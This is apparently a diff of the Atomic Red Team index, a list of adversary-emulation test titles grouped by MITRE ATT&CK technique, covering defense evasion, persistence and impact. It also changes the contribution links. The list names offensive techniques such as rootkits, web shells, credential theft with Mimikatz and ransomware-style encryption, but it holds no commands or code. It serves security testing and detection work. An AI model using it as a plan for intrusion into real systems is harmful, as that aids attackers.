@@ -918,18 +749,15 @@
- Atomic Test #7: Masquerading - windows exe running as different windows exe [windows]
- Atomic Test #8: Malicious process Masquerading as LSM.exe [windows]
- Atomic Test #9: File Extension Masquerading [windows]
- T1564.009 Resource Forking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1578.004 Revert Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.002 Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1578.004 Revert Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1036.002 Right-to-Left Override [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1207 Rogue Domain Controller](../../T1207/T1207.md)
- Atomic Test #1: DCShadow (Active Directory) [windows]
- Atomic Test #1: DCShadow - Mimikatz [windows]
- [T1014 Rootkit](../../T1014/T1014.md)
- Atomic Test #1: Loadable Kernel Module based Rootkit [linux]
- Atomic Test #2: Loadable Kernel Module based Rootkit [linux]
- [T1564.006 Run Virtual Instance](../../T1564.006/T1564.006.md)
- Atomic Test #1: Register Portable Virtualbox [windows]
- Atomic Test #2: Create and start VirtualBox virtual machine [windows]
- Atomic Test #3: Create and start Hyper-V virtual machine [windows]
- Atomic Test #3: Windows Signed Driver Rootkit Test [windows]
- T1564.006 Run Virtual Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1218.011 Rundll32](../../T1218.011/T1218.011.md)
- Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject [windows]
- Atomic Test #2: Rundll32 execute VBscript command [windows]
@@ -937,38 +765,22 @@
- Atomic Test #4: Rundll32 ieadvpack.dll Execution [windows]
- Atomic Test #5: Rundll32 syssetup.dll Execution [windows]
- Atomic Test #6: Rundll32 setupapi.dll Execution [windows]
- Atomic Test #7: Execution of HTA and VBS Files using Rundll32 and URL.dll [windows]
- Atomic Test #8: Launches an executable using Rundll32 and pcwutl.dll [windows]
- Atomic Test #9: Execution of non-dll using rundll32.exe [windows]
- Atomic Test #10: Rundll32 with Ordinal Value [windows]
- Atomic Test #11: Rundll32 with Control_RunDLL [windows]
- Atomic Test #12: Rundll32 with desk.cpl [windows]
- [T1134.005 SID-History Injection](../../T1134.005/T1134.005.md)
- Atomic Test #1: Injection SID-History with mimikatz [windows]
- T1553.003 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.009 Safe Mode Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1134.005 SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1553.003 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.011 Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
- Atomic Test #1: Service Registry Permissions Weakness [windows]
- Atomic Test #2: Service ImagePath Change with reg.exe [windows]
- [T1548.001 Setuid and Setgid](../../T1548.001/T1548.001.md)
- Atomic Test #1: Make and modify binary from C source [macos, linux]
- Atomic Test #2: Set a SetUID flag on file [macos, linux]
- Atomic Test #3: Set a SetGID flag on file [macos, linux]
- Atomic Test #4: Make and modify capabilities of a binary [linux]
- Atomic Test #5: Provide the SetUID capability to a file [linux]
- [T1218 Signed Binary Proxy Execution](../../T1218/T1218.md)
- Atomic Test #1: mavinject - Inject DLL into running process [windows]
- Atomic Test #2: SyncAppvPublishingServer - Execute arbitrary PowerShell code [windows]
- Atomic Test #3: Register-CimProvider - Execute evil dll [windows]
- Atomic Test #4: InfDefaultInstall.exe .inf Execution [windows]
- Atomic Test #5: ProtocolHandler.exe Downloaded a Suspicious File [windows]
- Atomic Test #6: Microsoft.Workflow.Compiler.exe Payload Execution [windows]
- Atomic Test #7: Renamed Microsoft.Workflow.Compiler.exe Payload Executions [windows]
- Atomic Test #8: Invoke-ATHRemoteFXvGPUDisablementCommand base test [windows]
- Atomic Test #9: DiskShadow Command Execution [windows]
- Atomic Test #10: Load Arbitrary DLL via Wuauclt (Windows Update Client) [windows]
- [T1216 Signed Script Proxy Execution](../../T1216/T1216.md)
- Atomic Test #1: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows]
- Atomic Test #2: manage-bde.wsf Signed Script Command Execution [windows]
@@ -978,10 +790,9 @@
- Atomic Test #3: Binary simply packed by UPX [macos]
- Atomic Test #4: Binary packed by UPX, with modified headers [macos]
- [T1036.006 Space after Filename](../../T1036.006/T1036.006.md)
- Atomic Test #1: Space After Filename (Manual) [macos]
- Atomic Test #2: Space After Filename [macos, linux]
- T1027.003 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1553 Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- Atomic Test #1: Space After Filename [macos]
- T1027.003 Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1553 Subvert Trust Controls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1548.003 Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
- Atomic Test #1: Sudo usage [macos, linux]
- Atomic Test #2: Unlimited sudo cache timeout [macos, linux]
@@ -990,14 +801,11 @@
- Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
- Atomic Test #2: Detect Virtualization Environment (Windows) [windows]
- Atomic Test #3: Detect Virtualization Environment (MacOS) [macos]
- Atomic Test #4: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) [windows]
- T1542.001 System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1221 Template Injection](../../T1221/T1221.md)
- Atomic Test #1: WINWORD Remote Template Injection [windows]
- T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.001 System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1221 Template Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1070.006 Timestomp](../../T1070.006/T1070.006.md)
- Atomic Test #1: Set a file's access timestamp [linux, macos]
- Atomic Test #2: Set a file's modification timestamp [linux, macos]
@@ -1010,321 +818,66 @@
- [T1134.001 Token Impersonation/Theft](../../T1134.001/T1134.001.md)
- Atomic Test #1: Named pipe client impersonation [windows]
- Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1127 Trusted Developer Utilities Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1218.012 Verclsid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1600 Weaken Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1127 Trusted Developer Utilities Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1222.001 Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md)
- Atomic Test #1: Take ownership using takeown utility [windows]
- Atomic Test #2: cacls - Grant permission to specified user or group recursively [windows]
- Atomic Test #3: attrib - Remove read-only attribute [windows]
- Atomic Test #4: attrib - hide file [windows]
- Atomic Test #5: Grant Full Access to folder for Everyone - Ryuk Ransomware Style [windows]
- Atomic Test #4: Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style [windows]
- [T1220 XSL Script Processing](../../T1220/T1220.md)
- Atomic Test #1: MSXSL Bypass using local files [windows]
- Atomic Test #2: MSXSL Bypass using remote files [windows]
- Atomic Test #3: WMIC bypass using local XSL file [windows]
- Atomic Test #4: WMIC bypass using remote XSL file [windows]
# persistence
- [T1546.008 Accessibility Features](../../T1546.008/T1546.008.md)
- Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
- Atomic Test #2: Replace binary of sticky keys [windows]
- [T1098 Account Manipulation](../../T1098/T1098.md)
- Atomic Test #1: Admin Account Manipulate [windows]
- Atomic Test #2: Domain Account and Group Manipulate [windows]
- Atomic Test #3: AWS - Create a group and add a user to that group [iaas:aws]
- Atomic Test #4: Azure - adding user to Azure AD role [azure-ad]
- Atomic Test #5: Azure - adding service principal to Azure AD role [azure-ad]
- Atomic Test #6: Azure - adding user to Azure role in subscription [iaas:azure]
- Atomic Test #7: Azure - adding service principal to Azure role in subscription [iaas:azure]
- Atomic Test #8: AzureAD - adding permission to application [azure-ad]
- Atomic Test #9: Password Change on Directory Service Restore Mode (DSRM) Account [windows]
- T1547.014 Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1137.006 Add-ins](../../T1137.006/T1137.006.md)
- Atomic Test #1: Code Executed Via Excel Add-in File (Xll) [windows]
- [T1098.001 Additional Cloud Credentials](../../T1098.001/T1098.001.md)
- Atomic Test #1: Azure AD Application Hijacking - Service Principal [azure-ad]
- Atomic Test #2: Azure AD Application Hijacking - App Registration [azure-ad]
- Atomic Test #3: AWS - Create Access Key and Secret Key [iaas:aws]
- T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.010 AppInit DLLs](../../T1546.010/T1546.010.md)
- Atomic Test #1: Install AppInit Shim [windows]
- [T1546.011 Application Shimming](../../T1546.011/T1546.011.md)
- Atomic Test #1: Application Shim Installation [windows]
- Atomic Test #2: New shim database files created in the default shim database directory [windows]
- Atomic Test #3: Registry key creation and/or modification events for SDB [windows]
- [T1053.001 At (Linux)](../../T1053.001/T1053.001.md)
- Atomic Test #1: At - Schedule a job [linux]
- [T1053.002 At (Windows)](../../T1053.002/T1053.002.md)
- Atomic Test #1: At.exe Scheduled task [windows]
- [T1547.002 Authentication Package](../../T1547.002/T1547.002.md)
- Atomic Test #1: Authentication Package [windows]
- [T1197 BITS Jobs](../../T1197/T1197.md)
- Atomic Test #1: Bitsadmin Download (cmd) [windows]
- Atomic Test #2: Bitsadmin Download (PowerShell) [windows]
- Atomic Test #3: Persist, Download, & Execute [windows]
- Atomic Test #4: Bits download using desktopimgdownldr.exe (cmd) [windows]
- [T1547 Boot or Logon Autostart Execution](../../T1547/T1547.md)
- Atomic Test #1: Add a driver [windows]
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1176 Browser Extensions](../../T1176/T1176.md)
- Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
- Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
- Atomic Test #3: Firefox [linux, windows, macos]
- Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md)
- Atomic Test #1: User scope COR_PROFILER [windows]
- Atomic Test #2: System Scope COR_PROFILER [windows]
- Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
- [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md)
- Atomic Test #1: Change Default File Association [windows]
- [T1136.003 Cloud Account](../../T1136.003/T1136.003.md)
- Atomic Test #1: AWS - Create a new IAM user [iaas:aws]
- [T1078.004 Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, windows, linux, macos]
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.015 Component Object Model Hijacking](../../T1546.015/T1546.015.md)
- Atomic Test #1: COM Hijacking - InprocServer32 [windows]
- Atomic Test #2: Powershell Execute COM Object [windows]
- T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md)
- Atomic Test #1: ListCronjobs [containers]
- Atomic Test #2: CreateCronjob [containers]
- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.003 Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
- [T1574.001 DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
- Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
- [T1574.002 DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
- [T1078.001 Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
- Atomic Test #2: Activate Guest Account [windows]
- [T1136.002 Domain Account](../../T1136.002/T1136.002.md)
- Atomic Test #1: Create a new Windows domain admin user [windows]
- Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows]
- Atomic Test #3: Create a new Domain Account using PowerShell [windows]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.006 Dynamic Linker Hijacking](../../T1574.006/T1574.006.md)
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
- [T1546.014 Emond](../../T1546.014/T1546.014.md)
- Atomic Test #1: Persistance with Event Monitor - emond [macos]
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098.002 Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1133 External Remote Services](../../T1133/T1133.md)
- Atomic Test #1: Running Chrome VPN Extensions via the Registry 2 vpn extension [windows]
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1062 Hypervisor [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505.004 IIS Components [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.012 Image File Execution Options Injection](../../T1546.012/T1546.012.md)
- Atomic Test #1: IFEO Add Debugger [windows]
- Atomic Test #2: IFEO Global Flags [windows]
- T1525 Implant Internal Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.006 Kernel Modules and Extensions](../../T1547.006/T1547.006.md)
- Atomic Test #1: Linux - Load Kernel Module via insmod [linux]
- T1546.006 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.008 LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1543.001 Launch Agent](../../T1543.001/T1543.001.md)
- Atomic Test #1: Launch Agent [macos]
- [T1543.004 Launch Daemon](../../T1543.004/T1543.004.md)
- Atomic Test #1: Launch Daemon [macos]
- [T1053.004 Launchd](../../T1053.004/T1053.004.md)
- Atomic Test #1: Event Monitor Daemon Persistence [macos]
- [T1136.001 Local Account](../../T1136.001/T1136.001.md)
- Atomic Test #1: Create a user account on a Linux system [linux]
- Atomic Test #2: Create a user account on a MacOS system [macos]
- Atomic Test #3: Create a new user in a command prompt [windows]
- Atomic Test #4: Create a new user in PowerShell [windows]
- Atomic Test #5: Create a new user in Linux with `root` UID and GID. [linux]
- Atomic Test #6: Create a new Windows admin user [windows]
- [T1078.003 Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #1: Create local account with admin privileges [windows]
- Atomic Test #2: Create local account with admin privileges - MacOS [macos]
- T1547.015 Login Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.002 Logon Script (Mac)](../../T1037.002/T1037.002.md)
- Atomic Test #1: Logon Scripts - Mac [macos]
- [T1037.001 Logon Script (Windows)](../../T1037.001/T1037.001.md)
- Atomic Test #1: Logon Scripts [windows]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.007 Netsh Helper DLL](../../T1546.007/T1546.007.md)
- Atomic Test #1: Netsh Helper DLL Registration [windows]
- T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1137 Office Application Startup](../../T1137/T1137.md)
- Atomic Test #1: Office Application Startup - Outlook as a C2 [windows]
- T1137.001 Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1137.002 Office Test](../../T1137.002/T1137.002.md)
- Atomic Test #1: Office Application Startup Test Persistence [windows]
- T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1137.004 Outlook Home Page](../../T1137.004/T1137.004.md)
- Atomic Test #1: Install Outlook Home Page Persistence [windows]
- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.002 Password Filter DLL](../../T1556.002/T1556.002.md)
- Atomic Test #1: Install and Register Password Filter DLL [windows]
- T1034 Path Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
- [T1547.011 Plist Modification](../../T1547.011/T1547.011.md)
- Atomic Test #1: Plist Modification [macos]
- [T1556.003 Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
- Atomic Test #1: Malicious PAM rule [linux]
- Atomic Test #2: Malicious PAM module [linux]
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.010 Port Monitors](../../T1547.010/T1547.010.md)
- Atomic Test #1: Add Port Monitor persistence in Registry [windows]
- [T1546.013 PowerShell Profile](../../T1546.013/T1546.013.md)
- Atomic Test #1: Append malicious start-process cmdlet [windows]
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.012 Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.004 RC Scripts](../../T1037.004/T1037.004.md)
- Atomic Test #1: rc.common [macos]
- Atomic Test #2: rc.common [linux]
- Atomic Test #3: rc.local [linux]
- T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md)
- Atomic Test #1: Re-Opened Applications [macos]
- Atomic Test #2: Re-Opened Applications [macos]
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.001 Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md)
- Atomic Test #1: Reg Key Run [windows]
- Atomic Test #2: Reg Key RunOnce [windows]
- Atomic Test #3: PowerShell Registry RunOnce [windows]
- Atomic Test #4: Suspicious vbs file run from startup Folder [windows]
- Atomic Test #5: Suspicious jse file run from startup Folder [windows]
- Atomic Test #6: Suspicious bat file run from startup Folder [windows]
- Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows]
- Atomic Test #8: Add persistance via Recycle bin [windows]
- Atomic Test #9: SystemBC Malware-as-a-Service Registry [windows]
- T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md)
- Atomic Test #1: Modify SSH Authorized Keys [macos, linux]
- [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md)
- Atomic Test #1: Scheduled Task Startup Script [windows]
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
- Atomic Test #5: Task Scheduler via VBA [windows]
- Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows]
- Atomic Test #7: Scheduled Task Executing Base64 Encoded Commands From Registry [windows]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.002 Screensaver](../../T1546.002/T1546.002.md)
- Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
- [T1547.005 Security Support Provider](../../T1547.005/T1547.005.md)
- Atomic Test #1: Modify SSP configuration in registry [windows]
- T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.011 Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
- Atomic Test #1: Service Registry Permissions Weakness [windows]
- Atomic Test #2: Service ImagePath Change with reg.exe [windows]
- [T1547.009 Shortcut Modification](../../T1547.009/T1547.009.md)
- Atomic Test #1: Shortcut Modification [windows]
- Atomic Test #2: Create shortcut to cmd in startup folders [windows]
- [T1037.005 Startup Items](../../T1037.005/T1037.005.md)
- Atomic Test #1: Add file to Local Library StartupItems [macos]
- T1542.001 System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1543.002 Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
- Atomic Test #2: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux]
- [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md)
- Atomic Test #1: Create Systemd Service and Timer [linux]
- Atomic Test #2: Create a user level transient systemd service and timer [linux]
- Atomic Test #3: Create a system level transient systemd service and timer [linux]
- T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.003 Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1505.002 Transport Agent](../../T1505.002/T1505.002.md)
- Atomic Test #1: Install MS Exchange Transport Agent Persistence [windows]
- [T1546.005 Trap](../../T1546.005/T1546.005.md)
- Atomic Test #1: Trap [macos, linux]
- [T1546.004 Unix Shell Configuration Modification](../../T1546.004/T1546.004.md)
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1505.003 Web Shell](../../T1505.003/T1505.003.md)
- Atomic Test #1: Web Shell Written to Disk [windows]
- [T1546.003 Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md)
- Atomic Test #1: Persistence via WMI Event Subscription [windows]
- [T1543.003 Windows Service](../../T1543.003/T1543.003.md)
- Atomic Test #1: Modify Fax service to run PowerShell [windows]
- Atomic Test #2: Service Installation CMD [windows]
- Atomic Test #3: Service Installation PowerShell [windows]
- Atomic Test #4: TinyTurla backdoor service w64time [windows]
- [T1547.004 Winlogon Helper DLL](../../T1547.004/T1547.004.md)
- Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
- Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]
- Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows]
- T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# impact
- [T1531 Account Access Removal](../../T1531/T1531.md)
- Atomic Test #1: Change User Password - Windows [windows]
- Atomic Test #2: Delete User - Windows [windows]
- Atomic Test #3: Remove Account From Domain Admin Group [windows]
- T1499.003 Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.003 Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1485 Data Destruction](../../T1485/T1485.md)
- Atomic Test #1: Windows - Overwrite file with Sysinternals SDelete [windows]
- Atomic Test #2: macOS/Linux - Overwrite file with DD [linux, macos]
- Atomic Test #3: Overwrite deleted data on C drive [windows]
- [T1486 Data Encrypted for Impact](../../T1486/T1486.md)
- Atomic Test #1: Encrypt files using gpg (Linux) [linux]
- Atomic Test #2: Encrypt files using 7z (Linux) [linux]
- Atomic Test #3: Encrypt files using ccrypt (Linux) [linux]
- Atomic Test #4: Encrypt files using openssl (Linux) [linux]
- Atomic Test #5: PureLocker Ransom Note [windows]
- T1565 Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
